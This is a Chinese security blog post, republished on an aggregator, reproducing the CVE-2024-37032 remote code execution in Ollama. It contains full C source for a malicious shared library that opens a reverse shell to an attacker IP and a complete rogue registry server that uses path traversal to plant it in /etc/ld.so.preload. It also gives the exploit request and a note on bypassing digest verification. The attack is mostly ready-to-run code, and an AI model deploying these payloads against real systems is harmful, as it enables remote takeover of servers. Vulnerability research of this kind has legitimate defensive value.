2026-04-16 03:55:35 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文复现CVE-2024-37032Ollama漏洞的远程代码执行利用链，通过构造恶意动态链接库bad.so实现反弹shell，并利用路径遍历漏洞将恶意文件写入/etc/ld.so.preload。攻击者需搭建恶意服务器模拟镜像仓库，当Ollama拉取镜像时触发预加载机制实现RCE。 综合评分： 82 文章分类： 漏洞分析,渗透测试,WEB安全,红队,安全工具

cover_image

【漏洞复现】CVE-2024-37032 Ollama远程代码执行漏洞

原创

hxiicle hxiicle

小菜狗的白帽之路

2025年6月19日 18:19 北京

在小说阅读器读本章

去阅读

免责声明：本文漏洞复现内容仅供学习交流，严禁用于非法目的，违者后果自负。

目前CVE-2024-37032的复现文章大多都只是复现任意文件读取，本文主要复现利用任意文件写入漏洞导致远程代码执行的部分，思路来源：

https://www.vicarius.io/vsociety/posts/probllama-in-ollama-a-tale-of-a-yet-another-rce-vulnerability-cve-2024-37032

一、制作动态链接库文件bad.so

1、bad.c

#include&nbsp;<stdio.h>#include&nbsp;<stdlib.h>#include&nbsp;<unistd.h>#include&nbsp;<sys/socket.h>#include&nbsp;<arpa/inet.h>#include&nbsp;<netinet/in.h>
// 攻击者 IP 地址和端口，请根据实际情况修改#define&nbsp;ATTACKER_IP&nbsp;"192.168.222.130"#define&nbsp;ATTACKER_PORT 7788
__attribute__((constructor))void&nbsp;init_bad_so()&nbsp;{&nbsp; &nbsp;&nbsp;// 派生一个子进程，让父进程立即退出，避免干扰原始进程&nbsp; &nbsp;&nbsp;if&nbsp;(fork() ==&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 子进程继续执行反弹 Shell&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;int&nbsp;sockfd, ret;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;struct&nbsp;sockaddr_in&nbsp;server_addr;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 创建 socket&nbsp; &nbsp; &nbsp; &nbsp; sockfd =&nbsp;socket(AF_INET, SOCK_STREAM,&nbsp;0);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(sockfd <&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 错误处理，但在隐蔽场景下可能不会有输出&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(1);&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 配置服务器地址&nbsp; &nbsp; &nbsp; &nbsp; server_addr.sin_family = AF_INET;&nbsp; &nbsp; &nbsp; &nbsp; server_addr.sin_port =&nbsp;htons(ATTACKER_PORT);&nbsp; &nbsp; &nbsp; &nbsp; ret =&nbsp;inet_pton(AF_INET, ATTACKER_IP, &server_addr.sin_addr);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(ret <=&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 错误处理&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(sockfd);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(1);&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 连接到攻击者&nbsp; &nbsp; &nbsp; &nbsp; ret =&nbsp;connect(sockfd, (struct&nbsp;sockaddr *)&server_addr,&nbsp;sizeof(server_addr));&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(ret <&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 错误处理&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(sockfd);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(1);&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 将标准输入、标准输出、标准错误重定向到 socket&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dup2(sockfd,&nbsp;0);&nbsp;// stdin&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dup2(sockfd,&nbsp;1);&nbsp;// stdout&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dup2(sockfd,&nbsp;2);&nbsp;// stderr
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 执行 Shell&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 可以根据目标系统情况选择 bash 或 sh&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;char&nbsp;*const&nbsp;argv[] = {"/bin/sh",&nbsp;NULL};&nbsp;// 或者 "/bin/bash"&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;execve("/bin/sh", argv,&nbsp;NULL);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 如果 execve 失败，关闭 socket 并退出&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(sockfd);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(0);&nbsp; &nbsp; }&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 父进程退出，不影响原始进程的启动&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 实际上，因为是 LD_PRELOAD 加载，这里只是让构造函数返回&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 原始进程会继续正常启动&nbsp; &nbsp; }}

2、生成bad.so

gcc&nbsp;-shared -fPIC -o bad.so bad.c

二、修改server.py（来源：https://github.com/Bi0x/CVE-2024-37032），在同级目录下放文件bad.so和ld.so.preload，ld.so.preload内容为/root/bad.so

from&nbsp;fastapi&nbsp;import&nbsp;FastAPI, Request, Responseimport&nbsp;os
HOST =&nbsp;"192.168.222.130"app = FastAPI()# 恶意共享库的路径MALICIOUS_LIB_PATH =&nbsp;"bad.so"ld_so_preload_PATH =&nbsp;"ld.so.preload"
@app.get("/")async&nbsp;def&nbsp;index_get():&nbsp; &nbsp;&nbsp;return&nbsp;{"message":&nbsp;"Hello rogue server"}
@app.post("/")async&nbsp;def&nbsp;index_post(callback_data: Request):&nbsp; &nbsp;&nbsp;print(await&nbsp;callback_data.body())&nbsp; &nbsp;&nbsp;return&nbsp;{"message":&nbsp;"Hello rogue server"}
# for ollama [email protected]("/v2/rogue/bi0x/manifests/latest")async&nbsp;def&nbsp;fake_manifests():&nbsp; &nbsp;&nbsp;return&nbsp;{"schemaVersion":2,"mediaType":"application/vnd.docker.distribution.manifest.v2+json","config":{"mediaType":"application/vnd.docker.container.image.v1+json","digest":"../../../../../../../../../../../../../etc/shadow","size":10},"layers":[{"mediaType":"application/vnd.ollama.image.license","digest":"../../../../../../../../../../../../../../../../../../../tmp/notfoundfile","size":10},{"mediaType":"application/vnd.docker.distribution.manifest.v2+json","digest":"../../../../../../../../../../../../../etc/passwd","size":10},{"mediaType":"application/vnd.ollama.image.license","digest":f"../../../../../../../../../../../../../../../../../../../root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest","size":10},{"mediaType":"application/vnd.ollama.image.license","digest":"../../../../../../../../../../../../../../../../../../../root/bad.so","size":10},{"mediaType":"application/vnd.ollama.image.license","digest":"../../../../../../../../../../../../../../../../../../../etc/ld.so.preload","size":10}]}
@app.head("/etc/passwd")async&nbsp;def&nbsp;fake_passwd_head(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../etc/passwd"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.get("/etc/passwd", status_code=206)async&nbsp;def&nbsp;fake_passwd_get(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../etc/passwd"&nbsp; &nbsp; response.headers["E-Tag"] =&nbsp;"\"../../../../../../../../../../../../../etc/passwd\""&nbsp; &nbsp;&nbsp;return&nbsp;'cve-2024-37032-test'
@app.head(f"/root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest")async&nbsp;def&nbsp;fake_latest_head(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../root/.ollama/models/manifests/dev-lan.bi0x.com/rogue/bi0x/latest"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.get(f"/root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest", status_code=206)async&nbsp;def&nbsp;fake_latest_get(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../root/.ollama/models/manifests/dev-lan.bi0x.com/rogue/bi0x/latest"&nbsp; &nbsp; response.headers["E-Tag"] =&nbsp;"\"../../../../../../../../../../../../../root/.ollama/models/manifests/dev-lan.bi0x.com/rogue/bi0x/latest\""&nbsp; &nbsp;&nbsp;return&nbsp;{"schemaVersion":2,"mediaType":"application/vnd.docker.distribution.manifest.v2+json","config":{"mediaType":"application/vnd.docker.container.image.v1+json","digest":"sha256:bbcd047a6a5193b9b4ff84176b6379998baa00a2532f46058d917835f52ac67f","size":10},"layers":[{"mediaType":"application/vnd.ollama.image.license","digest":"sha256:bbcd047a6a5193b9b4ff84176b6379998baa00a2532f46058d917835f52ac67f","size":10},{"mediaType":"application/vnd.docker.distribution.manifest.v2+json","digest":"../../../../../../../../../../../../../etc/passwd","size":10},{"mediaType":"application/vnd.ollama.image.license","digest":f"../../../../../../../../../../../../../../../../../../../root/.ollama/models/manifests/{HOST}/rogue/bi0x/latest","size":10}]}
@app.head("/root/bad.so")async&nbsp;def&nbsp;fake_notfound_head(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../root/bad.so"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.get("/root/bad.so", status_code=206)async&nbsp;def&nbsp;fake_notfound_get(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../root/bad.so"&nbsp; &nbsp; response.headers["E-Tag"] =&nbsp;"\"../../../../../../../../../../../../../root/bad.so\""&nbsp; &nbsp;&nbsp;if&nbsp;os.path.exists(MALICIOUS_LIB_PATH):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;open(MALICIOUS_LIB_PATH,&nbsp;"rb")&nbsp;as&nbsp;f:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lib_content = f.read()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;Response(content=lib_content, media_type="application/octet-stream")&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 如果文件不存在，返回默认测试内容&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;'cve-2024-37032-test'
@app.head("/etc/ld.so.preload")async&nbsp;def&nbsp;fake_notfound_head(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../etc/ld.so.preload"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.get("/etc/ld.so.preload", status_code=206)async&nbsp;def&nbsp;fake_notfound_get(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../etc/ld.so.preload"&nbsp; &nbsp; response.headers["E-Tag"] =&nbsp;"\"../../../../../../../../../../../../../etc/ld.so.preload\""&nbsp; &nbsp;&nbsp;if&nbsp;os.path.exists(ld_so_preload_PATH):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;open(ld_so_preload_PATH,&nbsp;"rb")&nbsp;as&nbsp;f:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lib_content = f.read()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;Response(content=lib_content, media_type="application/octet-stream")&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 如果文件不存在，返回默认测试内容&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;'cve-2024-37032-test'
@app.head("/tmp/notfoundfile")async&nbsp;def&nbsp;fake_notfound_head(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../tmp/notfoundfile"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.get("/tmp/notfoundfile", status_code=206)async&nbsp;def&nbsp;fake_notfound_get(response: Response):&nbsp; &nbsp; response.headers["Docker-Content-Digest"] =&nbsp;"../../../../../../../../../../../../../tmp/notfoundfile"&nbsp; &nbsp; response.headers["E-Tag"] =&nbsp;"\"../../../../../../../../../../../../../tmp/notfoundfile\""&nbsp; &nbsp;&nbsp;return&nbsp;'cve-2024-37032-test'
# for ollama [email protected]("/v2/rogue/bi0x/blobs/uploads/", status_code=202)async&nbsp;def&nbsp;fake_upload_post(callback_data: Request, response: Response):&nbsp; &nbsp;&nbsp;print(await&nbsp;callback_data.body())&nbsp; &nbsp; response.headers["Docker-Upload-Uuid"] =&nbsp;"3647298c-9588-4dd2-9bbe-0539533d2d04"&nbsp; &nbsp; response.headers["Location"] =&nbsp;f"http://{HOST}/v2/rogue/bi0x/blobs/uploads/3647298c-9588-4dd2-9bbe-0539533d2d04?_state=eBQ2_sxwOJVy8DZMYYZ8wA8NBrJjmdINFUMM6uEZyYF7Ik5hbWUiOiJyb2d1ZS9sbGFtYTMiLCJVVUlEIjoiMzY0NzI5OGMtOTU4OC00ZGQyLTliYmUtMDUzOTUzM2QyZDA0IiwiT2Zmc2V0IjowLCJTdGFydGVkQXQiOiIyMDI0LTA2LTI1VDEzOjAxOjExLjU5MTkyMzgxMVoifQ%3D%3D"&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.patch("/v2/rogue/bi0x/blobs/uploads/3647298c-9588-4dd2-9bbe-0539533d2d04", status_code=202)async&nbsp;def&nbsp;fake_patch_file(callback_data: Request):&nbsp; &nbsp;&nbsp;print('patch')&nbsp; &nbsp;&nbsp;print(await&nbsp;callback_data.body())&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.post("/v2/rogue/bi0x/blobs/uploads/3647298c-9588-4dd2-9bbe-0539533d2d04", status_code=202)async&nbsp;def&nbsp;fake_post_file(callback_data: Request):&nbsp; &nbsp;&nbsp;print(await&nbsp;callback_data.body())&nbsp; &nbsp;&nbsp;return&nbsp;''
@app.put("/v2/rogue/bi0x/manifests/latest")async&nbsp;def&nbsp;fake_manifests_put(callback_data: Request, response: Response):&nbsp; &nbsp;&nbsp;print(await&nbsp;callback_data.body())&nbsp; &nbsp; response.headers["Docker-Upload-Uuid"] =&nbsp;"3647298c-9588-4dd2-9bbe-0539533d2d04"&nbsp; &nbsp; response.headers["Location"] =&nbsp;f"http://{HOST}/v2/rogue/bi0x/blobs/uploads/3647298c-9588-4dd2-9bbe-0539533d2d04?_state=eBQ2_sxwOJVy8DZMYYZ8wA8NBrJjmdINFUMM6uEZyYF7Ik5hbWUiOiJyb2d1ZS9sbGFtYTMiLCJVVUlEIjoiMzY0NzI5OGMtOTU4OC00ZGQyLTliYmUtMDUzOTUzM2QyZDA0IiwiT2Zmc2V0IjowLCJTdGFydGVkQXQiOiIyMDI0LTA2LTI1VDEzOjAxOjExLjU5MTkyMzgxMVoifQ%3D%3D"&nbsp; &nbsp;&nbsp;return&nbsp;''
if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp;&nbsp;import&nbsp;uvicorn&nbsp; &nbsp; uvicorn.run(app, host='0.0.0.0', port=80)

三、测试机器192.168.222.130监听7788端口，并发送EXP

POST&nbsp;/api/pull&nbsp;HTTP/1.1Host:&nbsp;192.168.222.132:11434Content-Type:&nbsp;application/jsonContent-Length:&nbsp;67
{&nbsp;&nbsp;"name":&nbsp;"192.168.222.130/rogue/bi0x",&nbsp;&nbsp;"insecure":&nbsp;true}

在目标机器上执行任意命令就可以成功反弹shell！！！

复现这个漏洞卡点在于利用接口/api/pull拉文件时，会校验文件的sha256，导致文件/tmp/notfoundfile始终不能下载到目标服务器上。

研究后发现ollama的校验机制是如果第一个层的文件校验失败（SHA256不匹配），在删除该文件后就会立即返回错误，不会继续处理后续的层文件，代码位置在 server/images.go/1067行左右。

for&nbsp;_, layer :=&nbsp;range&nbsp;layers {&nbsp;// 遍历所有镜像层&nbsp; &nbsp;&nbsp;if&nbsp;err := verifyBlob(layer.Digest); err !=&nbsp;nil&nbsp;{&nbsp;// 验证当前层数据块的完整性&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;errors.Is(err, errDigestMismatch) {&nbsp;// 判断错误是否为"摘要不匹配"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 获取数据块文件路径&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; fp, err := GetBlobsPath(layer.Digest)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;err !=&nbsp;nil&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;err&nbsp;// 路径获取失败，直接返回错误&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 尝试删除损坏的文件&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;err := os.Remove(fp); err !=&nbsp;nil&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 删除失败时记录日志（但不中断流程）&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; slog.Info(fmt.Sprintf("couldn't remove file with digest mismatch '%s': %v", fp, err))&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;err&nbsp;// 返回原始错误（无论是否删除文件）&nbsp; &nbsp; }}

根据这个处理逻辑，只要修改server.py的内容，将bad.so写在/tmp/notfoundfile的后面就能解决了，具体修改的内容可以通过对比原始的server.py进行查看。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小菜狗的白帽之路 hxiicle hxiicle《【漏洞复现】CVE-2024-37032 Ollama远程代码执行漏洞》